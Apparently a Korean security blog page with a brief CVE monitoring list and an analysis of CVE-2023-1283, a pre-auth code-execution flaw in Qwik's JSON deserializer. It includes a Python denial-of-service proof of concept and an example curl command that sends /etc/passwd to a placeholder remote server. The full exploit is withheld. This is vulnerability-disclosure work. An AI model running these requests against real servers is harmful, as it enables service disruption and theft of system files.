2023-03-15 15:00:04.972524 (PHP, File Upload) CVE-2023-27235 https://cve.report/CVE-2023-27235
2023-03-15 16:00:06.079322 (Command Injection) CVE-2023-27240 https://cve.report/CVE-2023-27240
2023-03-15 18:00:05.173922 (PHP, SQL injection, Critical) CVE-2023-1407 https://cve.report/CVE-2023-1407
2023-03-15 21:00:07.066053 (WordPress, Wordpress Plugin) CVE-2023-25708 https://cve.report/CVE-2023-25708
2023-03-15 22:00:04.554644 (XSS) CVE-2023-0322 https://cve.report/CVE-2023-0322

 

반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 17. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 16. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 13. MR(Monitoring Report)  (0) 2023.03.14
[CVE] 2023. 03. 11. MR(Monitoring Report)  (0) 2023.03.12
[CVE] 2023. 03. 10. MR(Monitoring Report)  (0) 2023.03.11
반응형

ref

https://cve.report/CVE-2023-1283

https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8/

배경

NodeJS기반의 Framework인 Qwik(https://github.com/BuilderIO/qwik)을 사용하는 서비스에서 Qwik의 버전이 0.20.1 이하일 경우 Preauth Remote Command Execution 공격이 가능합니다.

분석

  • 분석은 취약한 버전인 0.20.1으로 진행
  • Qwik의 middleware request handler는 다음과 같은 순서로 설정
    • POST: securityMiddleware ⇒ pureServerFunction ⇒ fixTrailingSlash ⇒ renderQData
    • GET: fixTrailingSlash ⇒ renderQData
// packages/qwik-city/middleware/request-handler/resolve-request-handlers.ts
var resolveRequestHandlers = (serverPlugins, route, method, renderHandler) => {
  const routeLoaders = [];
  const routeActions = [];
  const requestHandlers = [];
  const isPageRoute = !!(route && isLastModulePageRoute(route[1]));

  if (serverPlugins) {
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      serverPlugins,
      isPageRoute,
      method
    );
  }
  if (route) {
    if (isPageRoute) {
      if (method === "POST") {
        requestHandlers.unshift(securityMiddleware);
        requestHandlers.push(pureServerFunction);
      }
      requestHandlers.push(fixTrailingSlash);
      requestHandlers.push(renderQData);
    }
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      route[1],
      isPageRoute,
      method
    );
    if (isPageRoute) {
      if (routeLoaders.length + actionsMiddleware.length > 0) {
        requestHandlers.push(actionsMiddleware(routeLoaders, routeActions));
      }
      requestHandlers.push(renderHandler);
    }
  }
  return requestHandlers;
};
  • securityMiddleware함수는 CSRF의 방지 목적으로 아래의 조건을 확인
    • request.headers.get(”origin”) == url.origin
function securityMiddleware({ url, request, error }) {
  const forbidden = request.headers.get("origin") !== url.origin;
  if (forbidden) {
    throw error(403, `Cross-site ${request.method} form submissions are forbidden`);
  }
}
  • pureServerFunction는 다음과 같은 조건을 통과할 경우 ev.parseBody 함수를 실행
  1. qfunc is defined in query
  2. X-QRL in header == qfunc in query
  3. Content-Type == application/qwik-json
async function pureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY); // var QFN_KEY = "qfunc";
  if (fn && ev.request.headers.get("X-QRL") === fn && ev.request.headers.get("Content-Type") === "application/qwik-json") {
    ev.exit();
    const qwikSerializer = ev[RequestEvQwikSerializer];
    const data = await ev.parseBody();
    if (Array.isArray(data)) {
      const [qrl, ...args] = data;
      if (isQrl(qrl) && qrl.getHash() === fn) {
        const result = await qrl.apply(ev, args);
        verifySerializable(qwikSerializer, result, qrl);
        ev.headers.set("Content-Type", "application/qwik-json");
        ev.send(200, await qwikSerializer._serializeData(result, true));
        return;
      }
    }
    throw ev.error(500, "Invalid request");
  }
}
  • SSR의 경우 DoS (poc)
import sys 
import requests 

host = sys.argv[1] 
headers = { "Origin": host, "X-QRL": "1", "Content-Type": "application/qwik-json" } 
response = requests.post(f'{host}/q-data.json?qfunc=1', headers=headers) 
print(response.text)
  • 위의 조건이 맞으면 ev.parseBody() 함수내 실행
function createRequestEvent(serverRequestEv, loadedRoute, requestHandlers, trailingSlash = true, basePathname = "/", qwikSerializer, resolved) {
	// skip
	parseBody: async () => {
      if (requestData !== void 0) {
        return requestData;
      }
      return requestData = parseRequest(requestEv.request, sharedMap, qwikSerializer);
    },
	// skip
}

// skip

var parseRequest = async (request, sharedMap, qwikSerializer) => {
  var _a2;
  const req = request.clone();
  const type = ((_a2 = request.headers.get("content-type")) == null ? void 0 : _a2.split(/[;,]/, 1)[0].trim()) ?? "";
  if (type === "application/x-www-form-urlencoded" || type === "multipart/form-data") {
    const formData = await req.formData();
    sharedMap.set(RequestEvSharedActionFormData, formData);
    return formToObj(formData);
  } else if (type === "application/json") {
    const data = await req.json();
    return data;
  } else if (type === "application/qwik-json") {
    return qwikSerializer._deserializeData(await req.text());
  }
  return void 0;
};
  • requestData가 undefined라면 parseRequest로 인자로 전달
  • 이때 content-type이 application/qwik-json이므로 qwikSerializer._deserializeData를 호출
// qwik/core.mjs
const _deserializeData = (data, element) => {
    const obj = JSON.parse(data);
    if (typeof obj !== 'object') {
        return null;
    }
    const { _objs, _entry } = obj;
    if (typeof _objs === 'undefined' || typeof _entry === 'undefined') {
        return null;
    }
    let doc = {};
    let containerState = {};
    if (element && isQwikElement(element)) {
        const containerEl = getWrappingContainer(element);
        if (containerEl) {
            containerState = _getContainerState(containerEl);
            doc = containerEl.ownerDocument;
        }
    }
    const parser = createParser(containerState, doc);
    reviveValues(_objs, parser);
    const getObject = (id) => _objs[strToInt(id)];
    for (const obj of _objs) {
        reviveNestedObjects(obj, getObject, parser);
    }
    return getObject(_entry);
};
  • 이 함수에서는 deserialize를 위한 Parser를 생성하고 reviveValue를 호출
  • Parser는 prepare, subs, fill 이 3가지 함수가 존재
const createParser = (containerState, doc) => {
    const fillMap = new Map();
    const subsMap = new Map();
    return {
        prepare(data) {
					// skip
        },
        subs(obj, subs) {
					// skip
        },
        fill(obj, getObject) {
					// skip
        },
    };
};
  • reviveValues 함수는 다음과 같이 _obj의 타입이 “string”이고 값이 “\u0001”이 아니라면 parser의 prepare함수를 호출
const reviveValues = (objs, parser) => {
    for (let i = 0; i < objs.length; i++) {
        const value = objs[i];
        if (isString(value)) {
            objs[i] = value === UNDEFINED_PREFIX ? undefined : parser.prepare(value); // UNDEFINED_PREFIX = "\\u0001"
        }
    }
  • prepare 함수에서는 _obj의 값 중 첫 Byte를 prefix값으로써 활용하고, 이 값과 맞는 serializers를 찾음
  • 일치하는 serializers가 존재한다면 _obj의 2번째 byte부터의 값을 첫 번째 인자로써 serializer의 prepare함수를 호출
prepare(data) {
    for (const s of serializers) {
        const prefix = s.prefix;
        if (data.startsWith(prefix)) {
            const value = s.prepare(data.slice(prefix.length), containerState, doc);
            if (s.fill) {
                fillMap.set(value, s);
            }
            if (s.subs) {
                subsMap.set(value, s);
            }
            return value;
        }
    }
    return data;
}
  • Serializers의 리스트는 다음과 같고 이들은 각각 정의된 prefix값을 보유
// // qwik/core.mjs
const serializers = [
    QRLSerializer,
    SignalSerializer,
    SignalWrapperSerializer,
    WatchSerializer,
    ResourceSerializer,
    URLSerializer,
    DateSerializer,
    RegexSerializer,
    ErrorSerializer,
    DocumentSerializer,
    ComponentSerializer,
    PureFunctionSerializer,
    NoFiniteNumberSerializer,
    URLSearchParamsSerializer,
    FormDataSerializer,
];
  • 이 중 PureFunctionSerializer를 참조
const PureFunctionSerializer = {
    prefix: '\\u0011',
    test: (obj) => typeof obj === 'function' && obj.__qwik_serializable__ !== undefined,
    serialize: (obj) => {
        return obj.toString();
    },
    prepare: (data) => {
        const fn = new Function('return ' + data)();
        fn.__qwik_serializable__ = true;
        return fn;
    },
    fill: undefined,
};
  • prefix는 \u0011이고 prepare함수는 인자값을 이용해 new Function 함수를 실행
  • 이때 원격으로 명령어 실행이 가능
    • exploit 비공개, @별도 연락 해주세요.
    • command
      • curl -F”a=@/etc/passwd” http://[remote_server]

패치 방법

반응형

'Hacking > CVE Report' 카테고리의 다른 글

[CVE-2023-1761] Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.12.  (0) 2023.04.19
[CVE-2022-47607]Usersnap <= 4.16 - Authenticated (Admin+) Stored Cross Site Scripting  (0) 2023.03.31
[CVE-2023-1308] Online Graduate Tracer System sql injection  (0) 2023.03.18
[CVE-2023-24657] pipipam v1.5 reflected cross-site scripting (XSS)  (0) 2023.03.16
[CVE-2023-1312] Certain versions of Pimcore/pimcore from Pimcore contain the following vulnerability  (0) 2023.03.11

+ Recent posts

티스토리툴바